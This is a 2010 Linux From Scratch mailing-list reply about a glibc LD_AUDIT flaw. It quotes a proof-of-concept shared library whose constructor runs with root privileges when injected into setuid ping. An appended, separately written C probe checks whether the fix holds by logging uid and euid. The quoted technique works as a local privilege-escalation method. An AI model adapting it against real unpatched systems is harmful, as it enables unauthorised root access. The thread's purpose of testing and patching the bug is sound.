On Sun, 24 Oct 2010 10:25:26 -0700, Bryan Kadzban <[email protected]>
wrote:
> You can make your own simple library like this:
>
> cat <<EOF >bad.c
> #include <stdlib.h>
> #include <sys/stat.h>
> #include <sys/types.h>
>
> /* Constructor: ld.so runs it as soon as the library is mapped, so in a
>    setuid target it executes with the target's effective uid. */
> void __attribute__((constructor)) init(void) {
>     /* EXPLOIT_TGT names a directory the invoking user could not
>        normally create; its appearance proves the constructor ran. */
>     mkdir(getenv("EXPLOIT_TGT"), 0755);
> }
> EOF
> gcc -fPIC -shared -o /tmp/libbad.so.0 bad.c
>
> Now, if your glibc is broken, this will create the directory and print
> the ping usage message:
>
> LD_AUDIT=/tmp/libbad.so.0 EXPLOIT_TGT=/usr/bin/bad ping
>
> Whereas if your glibc is not broken (2.10.1 is not... :-) ), it will
> only print the ping usage.
I tried this on a freshly built LFS-20101024 but couldn't reproduce the
problem. As a non-root user I get just the ping usage message. As the
root user, I get:
ERROR: ld.so: object '/tmp/libbad.so.0' cannot be loaded as audit interface:
undefined symbol: la_version: ignored
followed by the ping usage message, which is what is described in the
vulnerability. However, there's still no /usr/bin/bad directory created.
I probably just screwed something up, as the vulnerability as originally
described, using libpcprofile.so (which is built and installed as part
of the Glibc package), triggers the bug.
It'll be a while until I run another full build, but I'm recompiling glibc
now, with the patch I uploaded earlier. I'll post results tomorrow, but
expect it to work just fine.
Regards,
Matt.
--
http://linuxfromscratch.org/mailman/listinfo/lfs-dev
FAQ: http://www.linuxfromscratch.org/faq/
Unsubscribe: See the above information page
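As an added example, not code from the thread, from Bryan or from Glibc: a minimal LD_AUDIT object that exports la_version, so ld.so accepts it instead of printing the "undefined symbol: la_version: ignored" complaint quoted above, and whose constructor records the real and effective uid it ran with rather than creating a directory. It is built exactly like bad.c above. The AUDIT_MARKER variable, the marker file format and the function names are this example's own choices; <link.h> and LAV_CURRENT are assumed to be glibc's, with a labelled fallback for other headers.

```c
/* Added example: minimal LD_AUDIT object that records who loaded it.
 * Build:  gcc -fPIC -shared -o /tmp/libaudit.so.0 audit.c
 * Probe:  LD_AUDIT=/tmp/libaudit.so.0 AUDIT_MARKER=/tmp/audit.marker ping
 * AUDIT_MARKER is a name chosen for this example, not a glibc variable. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <link.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef LAV_CURRENT
/* Assumption for non-glibc headers: the audit interface was version 1
 * from its introduction until glibc 2.35 raised it to 2. */
#define LAV_CURRENT 1
#endif

/* ld.so looks this symbol up in every LD_AUDIT object.  Missing it
 * produces the "cannot be loaded as audit interface" message seen above.
 * Returning 0 tells ld.so to drop the object; returning LAV_CURRENT
 * accepts the interface version we were compiled against. */
unsigned int la_version(unsigned int version)
{
    /* Refuse an ld.so that speaks an older interface than ours. */
    return version >= LAV_CURRENT ? LAV_CURRENT : 0;
}

/* 1 when real and effective uid differ, i.e. the object was loaded
 * across a setuid boundary, which is exactly what the fix must prevent. */
int privilege_boundary_crossed(uid_t real, uid_t effective)
{
    return real != effective;
}

/* Formats the record the constructor writes; separated out so the
 * output can be checked without a setuid target.  Returns snprintf's
 * count, or a negative value on error. */
int format_marker(char *buf, size_t len, uid_t real, uid_t effective)
{
    return snprintf(buf, len, "uid=%u euid=%u crossed=%d\n",
                    (unsigned)real, (unsigned)effective,
                    privilege_boundary_crossed(real, effective));
}

/* Runs when ld.so maps the object, before la_version is consulted.  On
 * an ld.so that ignores LD_AUDIT for setuid programs no marker appears
 * when an unprivileged user runs ping; on a broken one it shows euid=0. */
static void __attribute__((constructor)) record_load(void)
{
    const char *path = getenv("AUDIT_MARKER");
    if (path == NULL)
        return;                      /* stand-alone run: nothing to do */

    char line[64];
    int n = format_marker(line, sizeof line, getuid(), geteuid());
    if (n < 0 || (size_t)n >= sizeof line)
        return;

    /* O_EXCL: never truncate or follow a file we did not create. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return;
    (void)write(fd, line, (size_t)n);
    close(fd);
}
```

Inspecting the marker after the probe tells you both whether the constructor ran at all and with which effective uid; as a non-root user, a fixed ld.so should leave no marker behind for a setuid ping.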